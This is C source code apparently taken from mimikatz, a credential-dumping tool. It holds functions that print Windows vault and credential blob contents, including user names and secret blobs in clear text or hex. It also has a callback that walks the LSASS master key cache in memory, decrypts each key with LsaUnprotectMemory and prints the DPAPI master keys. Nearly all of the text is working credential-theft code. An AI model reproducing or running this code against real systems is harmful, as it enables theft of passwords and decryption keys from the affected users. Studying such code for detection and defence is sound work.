void kull_m_string_displayLocalFileTime(IN PFILETIME pFileTime)
{
FILETIME ft;
if(pFileTime)
if(FileTimeToLocalFileTime(pFileTime, &ft))
kull_m_string_displayFileTime(&ft);
}
void kull_m_cred_vault_credential_descr(DWORD level, PKULL_M_CRED_VAULT_CREDENTIAL credential)
{
DWORD i;
kprintf(L"%*s" L"**VAULT CREDENTIAL**\n", level << 1, L"");
if(credential)
{
kprintf(L"%*s" L" SchemaId : ", level << 1, L""); kull_m_string_displayGUID(&credential->SchemaId); kprintf(L"\n");
kprintf(L"%*s" L" unk0 : %08x - %u\n", level << 1, L"", credential->unk0, credential->unk0);
kprintf(L"%*s" L" LastWritten : ", level << 1, L""); kull_m_string_displayFileTime(&credential->LastWritten); kprintf(L"\n");
kprintf(L"%*s" L" unk1 : %08x - %u\n", level << 1, L"", credential->unk1, credential->unk1);
kprintf(L"%*s" L" unk2 : %08x - %u\n", level << 1, L"", credential->unk2, credential->unk2);
kprintf(L"%*s" L" FriendlyName : %s\n", level << 1, L"", credential->FriendlyName);
kprintf(L"%*s" L" dwAttributesMapSize : %08x - %u\n", level << 1, L"", credential->dwAttributesMapSize, credential->dwAttributesMapSize);
for(i = 0; i < (credential->dwAttributesMapSize / sizeof(KULL_M_CRED_VAULT_CREDENTIAL_ATTRIBUTE_MAP)); i++)
kprintf(L"%*s" L" * Attribute %3u @ offset %08x - %u (unk %08x - %u)\n", level << 1, L"", credential->attributesMap[i].id, credential->attributesMap[i].offset, credential->attributesMap[i].offset, credential->attributesMap[i].unk, credential->attributesMap[i].unk);
for(i = 0; i < credential->__cbElements; i++)
kull_m_cred_vault_credential_attribute_descr(level + 1, credential->attributes[i]);
kprintf(L"\n");
}
}
void kull_m_cred_descr(DWORD level, PKULL_M_CRED_BLOB cred)
{
UNICODE_STRING uString;
kprintf(L"%*s" L"**CREDENTIAL**\n", level << 1, L"");
if(cred)
{
kprintf(L"%*s" L" credFlags : %08x - %u\n", level << 1, L"", cred->credFlags, cred->credFlags);
kprintf(L"%*s" L" credSize : %08x - %u\n", level << 1, L"", cred->credSize, cred->credSize);
kprintf(L"%*s" L" credUnk0 : %08x - %u\n\n", level << 1, L"", cred->credUnk0, cred->credUnk0);
kprintf(L"%*s" L" Type : %08x - %u\n", level << 1, L"", cred->Type, cred->Type);
kprintf(L"%*s" L" Flags : %08x - %u\n", level << 1, L"", cred->Flags, cred->Flags);
kprintf(L"%*s" L" LastWritten : ", level << 1, L""); kull_m_string_displayFileTime(&cred->LastWritten); kprintf(L"\n");
kprintf(L"%*s" L" unkFlagsOrSize : %08x - %u\n", level << 1, L"", cred->unkFlagsOrSize, cred->unkFlagsOrSize);
kprintf(L"%*s" L" Persist : %08x - %u\n", level << 1, L"", cred->Persist, cred->Persist);
kprintf(L"%*s" L" AttributeCount : %08x - %u\n", level << 1, L"", cred->AttributeCount, cred->AttributeCount);
kprintf(L"%*s" L" unk0 : %08x - %u\n", level << 1, L"", cred->unk0, cred->unk0);
kprintf(L"%*s" L" unk1 : %08x - %u\n", level << 1, L"", cred->unk1, cred->unk1);
kprintf(L"%*s" L" TargetName : %s\n", level << 1, L"", cred->TargetName);
kprintf(L"%*s" L" TargetAlias : %s\n", level << 1, L"", cred->TargetAlias);
kprintf(L"%*s" L" Comment : %s\n", level << 1, L"", cred->Comment);
kprintf(L"%*s" L" UnkData : %s\n", level << 1, L"", cred->UnkData);
kprintf(L"%*s" L" UserName : %s\n", level << 1, L"", cred->UserName);
kprintf(L"%*s" L" CredentialBlob : ", level << 1, L"");
uString.Length = uString.MaximumLength = (USHORT) cred->CredentialBlobSize;
uString.Buffer = (PWSTR) cred->CredentialBlob;
if(kull_m_string_suspectUnicodeString(&uString))
kprintf(L"%wZ", &uString);
else
kull_m_string_wprintf_hex(uString.Buffer, uString.Length, 1);
kprintf(L"\n");
kprintf(L"%*s" L" Attributes : ", level << 1, L"", cred->AttributeCount);
kull_m_cred_attributes_descr(level + 1, cred->Attributes, cred->AttributeCount);
}
}
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_masterkeys(IN ULONG_PTR pMasterKeyCacheList, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
{
KIWI_MASTERKEY_CACHE_ENTRY mesCredentials;
ULONG_PTR ptr;
ULONG monNb = 0;
PBYTE buffer;
if(ReadMemory(pMasterKeyCacheList, &mesCredentials, sizeof(LIST_ENTRY), NULL))
{
ptr = (ULONG_PTR) mesCredentials.Flink;
while(ptr != pMasterKeyCacheList)
{
if(ReadMemory(ptr, &mesCredentials, sizeof(KIWI_MASTERKEY_CACHE_ENTRY), NULL))
{
if(RtlEqualLuid(pData->LogonId, &mesCredentials.LogonId))
{
dprintf("\n\t [%08x]\n\t * GUID :\t", monNb++);
kull_m_string_displayGUID(&mesCredentials.KeyUid);
dprintf("\n\t * Time :\t"); kull_m_string_displayFileTime(&mesCredentials.insertTime);
if(buffer = (PBYTE) LocalAlloc(LPTR, mesCredentials.keySize))
{
if(ReadMemory(ptr + FIELD_OFFSET(KIWI_MASTERKEY_CACHE_ENTRY, key), buffer, mesCredentials.keySize, NULL))
{
kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(buffer, mesCredentials.keySize);
dprintf("\n\t * MasterKey :\t"); kull_m_string_dprintf_hex(buffer, mesCredentials.keySize, 0);
}
LocalFree(buffer);
}
}
ptr = (ULONG_PTR) mesCredentials.Flink;
}
else break;
}
}
else dprintf("KO");
}
